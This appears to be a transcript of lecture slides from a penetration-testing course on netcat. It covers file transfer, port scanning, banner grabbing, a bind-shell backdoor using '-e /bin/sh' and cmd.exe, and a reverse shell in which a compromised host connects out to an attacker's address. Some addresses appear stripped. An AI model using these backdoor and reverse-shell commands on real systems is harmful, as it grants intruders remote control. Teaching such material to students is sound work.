Presentation is loading. Please wait.

Presentation is loading. Please wait.

COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard.

Similar presentations


Presentation on theme: "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."— Presentation transcript:

1 COMP265 - Pentesting netcat

2 What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard output Low level Versatile “The network Swiss army knife”

3 Basic Operation Client mode: –Connects to specific remote port Listen mode: –Waits for connection on a port Both modes –Send Standard Input to net –Data from net sent to Standard Output Messages from netcat sent to standard Error Packets can have source routing attached

4 Netcat Command May be two letter command “nc” –Like cp and other traditional two letter unix commands –nc options hostname ports May be the word “netcat” Another variant “ncat”, from nmap project –Supports a few more options Depends on the platform, Kali has both Sometimes have to compile from source to get all options (Suse)

5 Command Options -llisten mode, for inbound connects -L"Listen harder" Persistent listener (Win only) -n numeric-only IP addresses, no DNS -p portlocal port number -rrandomize local and remote ports -s addrlocal source address -uUDP mode --sctp sctp mode -v verbose [use twice to be more verbose]

6 Command Options -i secsdelay interval for lines sent, ports scanned -tanswer TELNET negotiation -w secstimeout for connects and final net reads -z zero-I/O mode [used for scanning] These three options not available on some packages -o fileor -x file (hex) dump of traffic -e progor -c command program to exec after connect -g gatewaysource-routing hop point[s], up to 8

7 What for? Send files Telnet Backdoor Port scan Banner grabbing Reverse shell Relay (proxy) Port forward Replay

8 Arguments Host can be name or ip -n = no dns lookups, ip only otherwise full DNS forward and reverse lookup -v or -vv = verbose messages, always sent to standard error -w limits wait time, -w 3 recommended -o filename produces dump of all traffic > or < -i slows down sending, used if input from a file

9 Send Files Sender –nc -l -p 80 < file.txt –file.txt | nc -l -p 80 Reciever –nc > file.txt Note use of redirect and pipe Receiver could have been a web browser | all enhance power of netcat

10 Another Example dd if=/dev/sda3 | gzip | nc -l 80 nc > sda3.img.gz Or, listener can be receiver nc -w 3 -l 80 > /home.cmb.tar.gz tar -cvf - /home/cmb | gzip | nc

11 nc telnet cmblap:~ # telnet Trying Connected to Escape character is '^]'. 220 fivefortyfour.com ESMTP ^C ^] telnet> quit Connection closed. cmblap:~ # netcat fivefortyfour.com ESMTP helo 250 fivefortyfour.com quit 221 fivefortyfour.com cmblap:

12 As telnet client Netcat quits when you want it to Doesn't pay attention to standard input EOF Doesn't require escape character Less cruft Transfers arbitrary binary data Better utility for probing services Can use UDP -t responds automatically to telnet option negotiations

13 Probing? Netcat can do port scans This took around 1 sec cmblap:~ # netcat -v -w 2 -z jabber.fivefortyfour.com [ ] 631 (ipp) open jabber.fivefortyfour.com [ ] 445 (microsoft-ds) open jabber.fivefortyfour.com [ ] 139 (netbios-ssn) open jabber.fivefortyfour.com [ ] 111 (sunrpc) open jabber.fivefortyfour.com [ ] 110 (pop3) open jabber.fivefortyfour.com [ ] 80 (http) open jabber.fivefortyfour.com [ ] 53 (domain) open jabber.fivefortyfour.com [ ] 25 (smtp) open jabber.fivefortyfour.com [ ] 24 (?) open jabber.fivefortyfour.com [ ] 22 (ssh) open cmblap:~ #

14 UDP scans too These are much slower cmblap:~ # netcat -v -w 2 -z -u jabber.fivefortyfour.com [ ] 67 (bootps) open jabber.fivefortyfour.com [ ] 53 (domain) open

15 Scanning Options -i –Delay interval to slow down scans -r –Randomise ports, including source -z –Send no data (TCP) or minimal data (UDP) -i and -r help to avoid ids -vv reports closed ports

16 Fancier Scan echo QUIT | nc -v -w 5 target-host

17 Banner Grabbing cmblap:~ # netcat -v jabber.fivefortyfour.com [ ] 110 (pop3) open +OK Hello there. quit +OK Better luck next time. cmblap:~ # netcat -v jabber.fivefortyfour.com [ ] 25 (smtp) open 220 fivefortyfour.com ESMTP quit 221 fivefortyfour.com cmblap:~ # netcat -v jabber.fivefortyfour.com [ ] 22 (ssh) open SSH-1.99-OpenSSH_4.1 quit Protocol mismatch.

18 Chat Session Just for fun Machine –nc -l -p 1234 Machine 2 –nc Both machine's keyboard input appears on the other machine's screen Note: use -v option to solve problems that may appear

19 Web Browser echo “GET somewhere.com” | nc address 80 > page.html

20 Backdoor By routing netcat's standard output to a command interpreter, we create a remote shell cmblap:/usr/local/src/netcat-0.7.1/src #./netcat -l -n -v -s p e /bin/sh Connection from :4289 cmblap:/usr/local/src/netcat-0.7.1/src # I had to dl and build to enable the -e switch Cannot pass parameters to program

21 On the other end pdlnx2:~ # netcat -v DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap cmblap.fivefortyfour.com [ ] 1234 (search-agent) open df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda % / udev % /dev /dev/sda % /windows/C /dev/sda % /home/cmb exit pdlnx2:~ #

22 More backdoors On windows: nc -L -p d -e cmd.exe -L means listen hard –wait for connections –Not needed on unix -d means detach from process –Also not needed on linux

23 “Shoveling” a Shell Aka Reverse Shell Compromised machine cannot accept connections –Has to initiate connections because of firewall/NAT Attacker listens from outside the firewall –netcat -v -l -p 1234 Script on compromised machine starts shell then connects to attacker –netcat ip.addr e /bin/sh Script has to run forever, or at timed intervals, or in response to some event

24 Port Forwarding Forwarding localhost port 8080 to remote host port 80 ncat -l localhost sh-exec "ncat remote.host 80"

25 References ncat –http://nmap.org/ncat/http://nmap.org/ncat/ –User's guide is good reference netcat –http://netcat.sourceforge.net/http://netcat.sourceforge.net/ Don't forget the man pages

26 Lab Lab today will exercise many of these functions Due the day of the lab next week, Feb 18 –No new lab next week


Download ppt "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."

Similar presentations


Ads by Google